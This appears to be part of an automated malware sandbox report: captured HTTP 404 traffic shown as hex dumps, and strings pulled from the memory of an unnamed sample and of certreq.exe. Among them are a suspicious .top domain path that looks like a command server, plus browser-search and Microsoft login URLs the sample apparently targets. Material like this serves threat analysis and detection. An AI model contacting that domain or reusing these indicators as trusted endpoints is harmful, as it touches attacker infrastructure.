Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:22:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:22:08 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:22:11 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 27 May 2024 10:22:39 GMTserver: Apache / ZoneOSlast-modified: Mon, 06 Nov 2023 23:06:18 GMTetag: "1d7b-60983e6d29793"accept-ranges: bytescontent-length: 7547connection: closecontent-type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 38 32 45 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 3e 2e 63 75 72 72 65 6e 74 2d 75 72 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 34 45 34 45 34 45 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 39 35 39 35 39 35 3b 0a 0a 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 72 65 6d 3b 0a 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 33 43 33 43 43 3b 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 46 43 46 43 46 43 3b 0a 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 43 46 43 46 43 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 7d 0a 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 27 May 2024 10:22:42 GMTserver: Apache / ZoneOSlast-modified: Mon, 06 Nov 2023 23:06:18 GMTetag: "1d7b-60983e6d29793"accept-ranges: bytescontent-length: 7547connection: closecontent-type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 38 32 45 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 3e 2e 63 75 72 72 65 6e 74 2d 75 72 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 34 45 34 45 34 45 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 39 35 39 35 39 35 3b 0a 0a 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 72 65 6d 3b 0a 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 33 43 33 43 43 3b 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 46 43 46 43 46 43 3b 0a 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 43 46 43 46 43 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 7d 0a 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 27 May 2024 10:22:44 GMTserver: Apache / ZoneOSlast-modified: Mon, 06 Nov 2023 23:06:18 GMTetag: "1d7b-60983e6d29793"accept-ranges: bytescontent-length: 7547connection: closecontent-type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 38 32 45 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 3e 2e 63 75 72 72 65 6e 74 2d 75 72 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 34 45 34 45 34 45 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 39 35 39 35 39 35 3b 0a 0a 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 72 65 6d 3b 0a 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 33 43 33 43 43 3b 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 46 43 46 43 46 43 3b 0a 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 43 46 43 46 43 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 7d 0a 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 27 May 2024 10:22:47 GMTserver: Apache / ZoneOSlast-modified: Mon, 06 Nov 2023 23:06:18 GMTetag: "1d7b-60983e6d29793"accept-ranges: bytescontent-length: 7547connection: closecontent-type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 38 32 45 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 3e 2e 63 75 72 72 65 6e 74 2d 75 72 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 34 45 34 45 34 45 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 39 35 39 35 39 35 3b 0a 0a 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 72 65 6d 3b 0a 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 33 43 33 43 43 3b 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 46 43 46 43 46 43 3b 0a 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 43 46 43 46 43 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 7d 0a 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:35 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3987001681.00000000056D8000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.y94hr.top
Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3987001681.00000000056D8000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.y94hr.top/opfh/
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js
Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fasthosts.co.uk/
Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto
Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033jv
